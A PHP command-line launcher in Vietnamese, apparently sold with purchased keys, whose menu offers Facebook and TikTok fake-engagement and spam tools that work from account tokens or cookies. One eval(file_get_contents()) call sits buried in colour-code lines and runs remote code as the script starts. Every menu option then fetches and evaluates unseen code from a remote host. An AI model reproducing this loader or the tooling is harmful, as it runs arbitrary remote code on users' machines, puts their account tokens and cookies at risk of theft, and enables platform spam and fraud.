<?php
error_reporting(0);
$black="\033[0;30m";
$blackb="\033[1;30m";
$white="\033[0;37m";
$whiteb="\033[1;37m";
$red="\033[0;31m";
$redb="\033[1;31m";
$green="\033[0;32m";
$greenb="\033[1;32m";
$yellow="\033[0;33m";
$yellowb="\033[1;33m";
$syan="\033[1;36m";
$blue="\033[0;34m";
$blueb="\033[1;34m";
$purple="\033[0;35m";
$purpleb="\033[1;35m";
$lightblue="\033[0;36m";
$lightblue="\033[1;35m";
$lightblueb="\033[1;36m";
$ress = "\033[0;32m";
$res = "\033[0;33m";
$red = "\033[0;31m";
$green = "\033[0;37m";
$nau= "\e[38;5;94m";
$white = "\033[0;33m";
$xnhac = "\033[1;96m";
$trang = "\033[1;90m";
$do = "\033[1;91m";
$luc = "\033[1;92m";
$vang = "\033[1;93m";
$xduong = "\033[1;94m";
$hong = "\033[1;95m";
$trang = "\033[1;97m";
$y2="\033[0;33m";
$white= "\033[0;37m";
$cyan= "\e[1;36m";
$blue="\e[1;34m";
$ngreen="\033[42m";
$ngreen="\033[42m";
$maul=rand(31,37);$maui="\033[1;".$maul."m";$end="\033[0m";$whiteb="\033[1;37m";$ress = "\033[0;32m";$res = "\033[0;33m";$red = "\033[0;31m";$green = "\033[0;37m";$yellow = "\033[0;33m";$white = "\033[0;33m";$xnhac = "\033[1;96m";$trang = "\033[1;90m";$do = "\033[1;91m";@system('clear');eval(file_get_contents("https://tailebg2k6hh.000webhostapp.com/fmlteam/logo"));$luc = "\033[1;92m";
$vang = "\033[1;93m";
$xduong = "\033[1;94m";
$hong = "\033[1;95m";
$trang = "\033[1;97m";
$nenden = "\033[40m";
$xanhd = "\033[0;36m";
$nendo = "\033[41m";
$nenxanh = "\033[42m";
$nenvang = "\033[43m";
$nenblue = "\033[44m";
$nenPurpe = "\033[45m";
$nenCyan = "\033[46m";
$nentrang = "\033[47m";
$UGreen = "\033[4;32m";
$BGreen = "\033[1;32m";
$ress = "\033[0;32m";
$res = "\033[0;33m";
$red = "\033[0;31m";
$green = "\033[0;37m";
$yellow = "\033[0;33m";
$white = "\033[0;33m";
$banner = "\r";$xnhac = "\033[1;96m";$trang = "\033[1;90m";$do = "\033[1;91m";$luc = "\033[1;92m";$vang = "\033[1;93m";$xduong = "\033[1;94m";$hong = "\033[1;95m";
$trang = "\033[1;97m";
$thanhngang = $xduong."==========================================================\n";
//thời gian 
date_default_timezone_set("Asia/Ho_Chi_Minh");
$ngayht = date('d-m-Y');
$thoigian = date('H:i:s');
$ngay = date('d');
$thang = date('m');
$nam = date('Y');
$gio = date('H');
$phut = date('i');
$giay = date('s');
//khung màu 
$catkhung="\033[0m";
$khungdo="\033[1;41m";
$khungden="\033[1;40m";
$khungvang="\033[1;43m";
$khungluc="\033[1;42m";
$khungduong="\033[1;44m";
$khunghong="\033[1;45m";
$khungtrang="\033[1;47m";
$khungxam="\033[1;48m";
//logo
$maul=rand(31,37);$maui="\033[1;".$maul."m";$end="\033[0m";$whiteb="\033[1;37m";$ress = "\033[0;32m";$res = "\033[0;33m";$red = "\033[0;31m";$green = "\033[0;37m";$yellow = "\033[0;33m";$white = "\033[0;33m";$xnhac = "\033[1;96m";$trang = "\033[1;90m";$do = "\033[1;91m";@system('clear');echo "\033[1;36m \n";
$t=
 $trang."\033[1;  (c).-.(c)             ░██████╗░░█████╗░██╗░░░░░░█████╗░";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;32m\n";
$t=
 $trang."\033[1;   / ._. \              ██╔════╝░██╔══██╗██║░░░░░██╔══██╗";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;95m\n";
$t=
 $trang."\033[1; __\( Y )/__            ██║░░██╗░███████║██║░░░░░██║░░██║";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;31m\n";
$t= 
 $trang."\033[1;(_.-/'-'\-._)           ██║░░╚██╗██╔══██║██║░░░░░██║░░██║";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;34m\n";
$t=
 $trang."\033[1;   ||   ||              ╚██████╔╝██║░░██║███████╗╚█████╔╝";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;35m\n";
$t=
 $trang."\033[1; _.' `-' '._            ░╚═════╝░╚═╝░░╚═╝╚══════╝░╚════╝░";
 for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
 usleep(2000);
 }
 echo "\033[1;36m\n";
$t=
 $trang."\033[1;(.-./`-'\.-.)      █░█ ▄▀█ █▀█   ▀█▀ █░█ ▄▀█ █    ▀█▀ █▀█ █▀█ █░░";
 for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
 usleep(2000);
 }
 echo "\033[1;37m\n";
$t=
 $trang."\033[1; `-'     `-'       █▀█ █▀█ █▄█   ░█░ █▀█ █▀█ █    ░█░ █▄█ █▄█ █▄▄    ";
 for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
 usleep(2000);
 }
 echo "\n";
 //codekey
$a=date('d'); 
        $b=date("m");
        $thoigian=date('d/m');
$day = [];
$day= date('d-m-y');
$today = date("d-m-y");
$d = date("d-m");
echo "\e[1;96mKey Đăng Nhập Quá 2 Ip Xóa Key Không Báo Trước! \n";
echo "\e[1;95m┌─[\e[1;37m\e[1;42m =》》Nhập Key Đã Mua \e[0m\e[1;95m]
└──╼ \e[1;93m《\033[1;35mThái Hào\e[1;93m》 : $do ";
$key_tool = trim(fgets(STDIN));
$get_qdc = json_decode(file_get_contents("http://thaihao.online/api_key/check_key.php?key=".$key_tool), true);
$ngay_mua = $get_qdc['create']; //ngày mua
$han_key = $get_qdc['end']; //người mua
$ip_ad = $get_qdc['ip']; //ip trên key
if($get_qdc['status'] == "error") {
echo $red.$get_qdc['msg'];
exit();
} else if($ngay_mua == $han_key){
echo "\33[1;36m[\33[1;33m🔒\33[1;36m]\33[1;37m ⇒\33[1;31m Api Key Không Hợp Lệ \n";
echo "\33[1;36m[\33[1;37m➩\33[1;36m]\33[1;37m ⇒\33[1;33m Lên: https://thaihao.online Mua Key Nha!!\n";
exit();
} else {
if($get_qdc['status'] == "success") {
echo "\33[1;32m[\33[1;32m《✔》\33[1;32m]\33[1;37m ⇒\33[1;32m Api Key Chính Xác";
sleep(2);
} else {
echo "\33[1;36m[\33[1;31m✘\33[1;36m]\33[1;37m ⇒\33[1;33m Api Key Không Hợp Lệ\n";
echo "\33[1;36m[\33[1;37m➩\33[1;36m]\33[1;37m ⇒\33[1;33m Lên: https://thaihao.online Mua Key Nha!!\n";
exit();
}
}
#xongkey#
@system('clear');
$maul=rand(31,37);$maui="\033[1;".$maul."m";$end="\033[0m";$whiteb="\033[1;37m";$ress = "\033[0;32m";$res = "\033[0;33m";$red = "\033[0;31m";$green = "\033[0;37m";$yellow = "\033[0;33m";$white = "\033[0;33m";$xnhac = "\033[1;96m";$trang = "\033[1;90m";$do = "\033[1;91m";@system('clear');echo "\033[1;36m \n";
$t=
 $trang."\033[1;  (c).-.(c)             ░██████╗░░█████╗░██╗░░░░░░█████╗░";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;32m\n";
$t=
 $trang."\033[1;   / ._. \              ██╔════╝░██╔══██╗██║░░░░░██╔══██╗";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;95m\n";
$t=
 $trang."\033[1; __\( Y )/__            ██║░░██╗░███████║██║░░░░░██║░░██║";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;31m\n";
$t= 
 $trang."\033[1;(_.-/'-'\-._)           ██║░░╚██╗██╔══██║██║░░░░░██║░░██║";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;34m\n";
$t=
 $trang."\033[1;   ||   ||              ╚██████╔╝██║░░██║███████╗╚█████╔╝";
for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
  usleep(2000);
}
echo "\033[1;35m\n";
$t=
 $trang."\033[1; _.' `-' '._            ░╚═════╝░╚═╝░░╚═╝╚══════╝░╚════╝░";
 for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
 usleep(2000);
 }
 echo "\033[1;36m\n";
$t=
 $trang."\033[1;(.-./`-'\.-.)      █░█ ▄▀█ █▀█   ▀█▀ █░█ ▄▀█ █    ▀█▀ █▀█ █▀█ █░░";
 for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
 usleep(2000);
 }
 echo "\033[1;37m\n";
$t=
 $trang."\033[1; `-'     `-'       █▀█ █▀█ █▄█   ░█░ █▀█ █▀█ █    ░█░ █▄█ █▄█ █▄▄    ";
 for($i=11;$i<(strlen($t)+1);$i++){echo $t[$i];
 usleep(2000);
 }
 echo "\n";
echo $thanhngang;
echo "\n";
echo $vang."@PowerByThái Hào\n";
echo $vang."[".$do."➩".$vang."]".$trang."=>".$hong."Mua Key Lên Ngay: https://thaihao.online\n";
echo $do."[".$luc."●".$do."] ".$trang."=> ".$vang."THÔNG TIN API KEY  \n";
echo $do."[".$luc."●".$do."] ".$trang."=> ".$luc."Tên Người Mua: ".$vang.$get_qdc['name']; //người mua
echo "\n";
echo $do."[".$luc."●".$do."] ".$trang."=> ".$luc."Ngày Mua     : ".$do.$get_qdc['create']; //ngày mua
echo "\n";
echo $do."[".$luc."●".$do."] ".$trang."=> ".$luc."Ngày Hết Hạn : ".$trang.$get_qdc['end']; //ngày hết hạn
echo "\n";
echo $thanhngang;
echo "\n";
echo $thanh_dep.$do."TOOL TRAO ĐỔI SUB \n";
echo"\033[1;35m┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ \n";
echo $hong."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$xnhac."1".$do."]".$luc." Tool Trao Đổi Sub Token ".$hong."               ┃\n";
echo $hong."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$xnhac."2".$do."]".$luc." Tool Trao Đổi Sub Cookie ".$hong."              ┃\n";
echo"\033[1;35m┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ \n";
echo $thanh_dep.$vang."TOOL TƯƠNG TÁC CHÉO \n";
echo"\033[1;34m┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ \n";
echo $xduong."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."3".$do."]".$luc." Tool Tương Tác Chéo Đa Token ".$xduong."          ┃\n";
echo $xduong."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."4".$do."]".$luc." Tool Tương Tác Chéo Đa Cookie ".$xduong."         ┃\n";
echo $xduong."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."5".$do."]".$luc." Tool Tương Tác Chéo Tiktok ".$xduong."            ┃\n";
echo"\033[1;34m┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ \n";
echo $thanh_dep.$xnhac."TIỆN ÍCH \n";
echo"\033[1;37m┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ \n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."6".$do."]".$luc." Tool Nuôi Facebook VIP Đa Cookie ".$trang."      ┃\n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."7".$do."]".$luc." Tool Comment Group Bằng Page ".$trang."          ┃\n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."8".$do."]".$luc." Tool Comment Dạo ".$trang."                      ┃\n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."9".$do."]".$luc." Tool Comment Group (theo ID) ".$trang."          ┃\n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."10".$do."]".$luc." Tool Gửi Lời Mời Kết Bạn ".$trang."             ┃\n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."11".$do."]".$luc." Tool Chọc Bạn Bè ".$trang."                     ┃\n"; 
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."12".$do."]".$luc." Tool Bão Like ".$trang."                        ┃\n";
echo $trang."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."13".$do."]".$luc." Tool Share Ảo ".$trang."                        ┃\n";
echo"\033[1;37m┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ \n";
echo $thanh_dep.$xnhac."Liên Hệ Ad \n";
echo"\033[1;31m┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓ \n";
echo $do."┃ ".$thanh_dac_biet.$luc."Nhập ".$do."[".$vang."14".$do."]".$luc." liên hệ ad ".$do."                           ┃\n";
echo"\033[1;31m┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛ \n";
echo $thanhngang;
echo "\033[1;31m🌸 [ \033[1;36mHÀO \033[1;31m]\033[1;37m => Vui Lòng Chọn: $vang";
$chedo=trim(fgets(STDIN));
//getfile=>host
$tds1="https://thaihao.online/golaphi/1tdshaoka"; //1
$tds2="https://thaihao.online/golaphi/2tdshaoka"; //2
$ttc1="https://thaihao.online/golaphi/3ttchaoka";//3
$ttc2="https://thaihao.online/golaphi/4ttchaoka";//4
$ttc3="https://thaihao.online/golaphi/5ttchaoka";//5
$nuoifbvip="https://thaihao.online/golaphi/6nuoifbviphaoka";//6
$toolcmtpage="https://thaihao.online/golaphi/7cmtgr=pagehaoka";//7
$toolcmtdao="https://thaihao.online/golaphi/8cmtdaoohaoka";//8
$toolcmtgr="https://thaihao.online/golaphi/9cmtgridhaoka" ;//9
$guikb="https://thaihao.online/golaphi/10guiaddhaoka"; //10
$chocbb="https://thaihao.online/golaphi/11chochaoka"; //11
$baolike="https://thaihao.online/golaphi/12baolikehaoka"; //12
$share="https://thaihao.online/golaphi/13shareao"; //13 
//thực thi lệnh đây nha mấy cha
if ($chedo == "1"){eval(file_get_contents($tds1));}
if ($chedo == "2"){eval(file_get_contents($tds2));}
if ($chedo == "3"){eval(file_get_contents($ttc1));}
if ($chedo == "4"){eval(file_get_contents($ttc2));}
if ($chedo == "5"){eval(file_get_contents($ttc3));}
if ($chedo == "6"){eval(file_get_contents($nuoifbvip));}
if ($chedo == "7"){eval(file_get_contents($toolcmtpage));}
if ($chedo == "8"){eval(file_get_contents($toolcmtdao));}
if ($chedo == "9"){eval(file_get_contents($toolcmtgr));}
if ($chedo == "10"){eval(file_get_contents($guikb));}
if ($chedo == "11"){eval(file_get_contents($chocbb));}
if ($chedo == "12"){eval(file_get_contents($baolike));}
if ($chedo == "13"){eval(file_get_contents($share));}
if ($chedo == "14"){@system('xdg-open https://facebook.com/doanhao2005');}
//fuckyou cút khỏi code tao ngay
//địt con mẹ mày
else{exit($vang."nhập lại đi má sai chế độ kìa\n");}
function get($url){
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
    $headers = array();
    $headers[] = 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36';
    $headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
    $headers[] = 'Accept-Language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5';
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    $result = curl_exec($ch);
    if (curl_errno($ch)) {
        echo 'Vui lòng kiểm tra lại kết nối hoặc có thể do lỗi máy chủ!';
    }
    curl_close($ch);
    return $result;
}